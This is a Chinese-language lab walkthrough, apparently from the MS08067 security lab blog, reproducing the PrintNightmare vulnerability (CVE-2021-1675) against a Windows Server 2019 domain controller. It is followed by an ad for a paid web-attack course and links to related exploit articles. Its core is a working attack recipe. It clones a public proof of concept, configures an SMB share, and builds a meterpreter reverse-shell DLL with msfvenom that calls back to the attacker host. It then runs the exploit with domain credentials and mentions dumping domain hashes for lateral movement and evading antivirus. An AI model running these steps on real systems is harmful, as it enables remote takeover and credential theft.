微软通杀漏洞-CVE-2021-1675复现
文章来源|MS08067安全实验室
本文作者:龙诺(Web知识星球追洞小组)
一 准备环境
实验环境:windows2019 (192.168.189.145)
kali linux (192.168.189.146)
需要:一个普通的域账户
需要:开启 print spooler服务
使用反弹shell :需要关闭windows2019的安全中心 或者用免杀
需要:windows2019安装smb1协议(没有这个会报错)
二 搭建环境
安装impacket
我这里使用的是python虚拟环境安装搭建这样的好处是不破坏系统环境,因为python有时候安装各种模块多了容易冲突所一我们使用虚拟环境。
构造虚拟环境
virtualenv -p python3 文件夹
如果没有virtualenv的话需要你pip安装模块
构造完成以后我们使用
source 文件夹/bin/activate
进入后我们去github下载poc安装
git clone https://github.com/cube0x0/CVE-2021-1675.git git clone https://github.com/cube0x0/impacket
首先要下载poc impacket模块然后安装
因为我们使用的是虚拟环境所以我们可以直接安装安装完以后切换到poc处就可以了
source 文件夹/bin/activate python setup.py install python CVE-2021-1675.py -h
配置smb服务器
[global] workgroup = workgroup server string = test netbios name = MZ security = user map to guest = Bad User smb ports = 445 log file = /var/log/samba/log.%m max log size = 5 min protocol = SMB2
[smb] comment = Samba browseable = yes writeable = yes public = yes path = /tmp/ read only = no guest ok = yes
按照这个配置以后就可以使用impacket-smbserver 文件名、目录、开启服务器,如图
生成dll和启动msf
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.189.146 LPORT=4444 -f dll -o /tmp/rever.dll msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp exploit
利用漏洞
python CVE-2021-1675.py demonba.xxx/yuce:Hello7p@192.168.189.145 '\\192.168.189.146\smb\rever.dll'
如果出错则需要安装smb1在windows2019上出错代码,下图
可以现在2019连接smb服务器出现这种报错
成功,下图
impacket-smbserver服务器也会有数据交互
同时会有反弹shell
我们可以直接查看域中账户hash 进行横向渗透
dll文件在windows
上传成功,如果开着windows安全中心会出现图
上传不成功
这里就要考虑免杀了,切记只能是普通账户
漏洞扫描
https://github.com/cybersecurityworks553/CVE-2021-1675_PrintNightMare
总结
需要了解smb配置
windows2019域配置
在kali无法连接2019的时候逆向思考看看2019可以连接smb共享文件码?
https://github.com/cube0x0/CVE-2021-1675/issues/36 这里也有人问这个问题我不知道他解决了吗?
我是受下面一句话很长时间突然开悟了2019可以链接吗?
复现看着简单但是各种环境问题还有小白配置问题只有复现了才知道!
追洞小组负责人Taoing主讲
WEB高级攻防实战班 第1期 来袭
课程围绕:外围打点、边界突破、PHP审计、SRC漏洞挖掘、应急响应
课程大纲(最新)
*大纲仅作为参考,会根据当期进度有所变化(加客服获取高清课程导图)
课程目录(最新)
课程费用
每期班定价2999,第一期班首发价:2499(前50名送365元Web安全知识星球名额),每个报名学员都可享受一次免费的重听权益,一次没学懂就再来一遍,后续培训可任选一期来听。请有意参加培训的学员抓紧报名!
支持支付宝、信用卡、花呗分期,对公转账,可开发票!
学习资源
前50名报名同学,送365元Web知识星球名额,可提前先行学习Web安全相关知识,并提供课程中需要的相关软件和环境。
上课时间
每周一、二、三、四的晚上 19:00-21:00 ,共24天,48课时,为期6周。如果无法准时参加直播课程,在线培训的每节课程都会被录制成视频上传到学员区,可随时下载观看。
上课方式
培训采用在线直播+随堂录播+微信群解答的形式,无需等待,报名后立即进入“Web星球”开始预习。
讲师介绍
Taoing:MS08067安全实验室核心成员,Web安全知识星球合伙人,安恒信息安全高级工程师,擅长企业安全研究、情报分析、渗透测试,安全开发。
TtssGkf:MS08067安全实验室核心成员,Web安全知识星球合伙人,Defcon Group 86021议题分享者,致力于漏洞分析、代码审计、漏洞挖掘。
你距离大佬,只差一个决定
详情咨询请联系小客服
扫描下方二维码加入星球学习
加入后邀请你进入内部微信群,内部微信群永久有效!
来和5000+位同学一起加入星球学习吧!
微软通杀漏洞-CVE-2021-1675复现相关推荐
- e7xue.php漏洞_简要分析最近的dedecms通杀漏洞以及漏洞补丁的绕过
话说文章写得菜不要紧,首先标题要跟大牛一样! 作者:单恋一支花 出自:t00ls 转载请注明出处,如有雷同,纯属别人抄袭,嘿嘿! 一:写在前面 今天晚上想老婆了,失眠了,蛋裂之余,进吐司寻找基友,惊现 ...
- 某彩虹资源共享通杀漏洞
任意文件读取是属于文件操作漏洞的一种. 一般任意文件读取漏洞可以读取配置的信息甚至系统文件更重要. 是的你没看错,通杀0day 在某天上课的时候闲着,音乐老师放着好运来,好机会啊,赶紧挖个洞看看,接着 ...
- 网站安全检测 漏洞检测 对thinkphp通杀漏洞利用与修复建议
thinkphp在国内来说,很多站长以及平台都在使用这套开源的系统来建站,为什么会这么深受大家的喜欢,第一开源,便捷,高效,生成静态化html,第二框架性的易于开发php架构,很多第三方的插件以及第三 ...
- sdcms_php_web,SDCMS通杀漏洞
作者:T00LS 鬼哥 漏洞文件:后台目录/index.asp 作者声明:转载请注明 T00ls 鬼哥 Sub Check Dim username,password,code,getcode,Rs ...
- 一起来看看这份集齐vue2.0/vue3.0面试通杀秘籍(2021版) PDF,面试官问的源码问题绝对稳了!
Vue3.0 对于我们前端人的重要性 -- 2021年面试必备 前言 2020年09月18日,vue3.0正式发布.随着它的发布,Vue.js再次被推上了前端的风口浪尖. 同时,面试官的提问也将加入一 ...
- php代码审计【23】齐博CMS通杀漏洞漏洞
一.安装好齐博CMS_V7,安装完成后如下: 二.分析代码 common.inc.php foreach($_COOKIE AS $_key=>$_value){unset($$_key); } ...
- iis+php解析漏洞修复,IIS7.0畸形解析漏洞通杀0day
IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样.使用iis7.0的注意了.临时解决办法:关闭cgi.fix_pathinfo为0 Nginx好像又爆0day了,windows下可 ...
- 易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析及利用漏洞预警 -电脑资料...
刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序, 找到get_client_ip()函数 ...
- /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -
DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...
最新文章
- 实验四:使用库函数API和C代码中嵌入汇编代码两种方式使用同一个系统调用
- 有关bbr以及锐速的更新搬运
- 剪绳子python_Python剪绳子如何实现 Python剪绳子实现代码
- java小编程---最长公共前缀
- cesium cesium is not defined
- 前端实践(4)——表单验证(密码重复输入检查)
- Libnet核心数据结构
- 求 s = a+aa+aaa+… …+aaa…a的值,其中a是一个数字
- JSP还有必要学吗 这篇文章告诉你
- Shiro-02-subject与session
- Excel和WPS 下设置多种不同条件的条件格式
- Excel公式向导,详细演艺多条件求平均值的操作
- BDTC 2017数据库上午:犹他大学、东方国信、蚂蚁金服、微软、人大金仓
- SAP License:SAP软件作用是什么
- 破解EXCEL工作表保护密码
- CentOS7出现a problem has occured and the system can‘t recover
- Python基础知识回顾
- Java中的数据文件
- 2021年,我们 CSDN App做了什么?
- 数据库系统之幻影读现象项目练习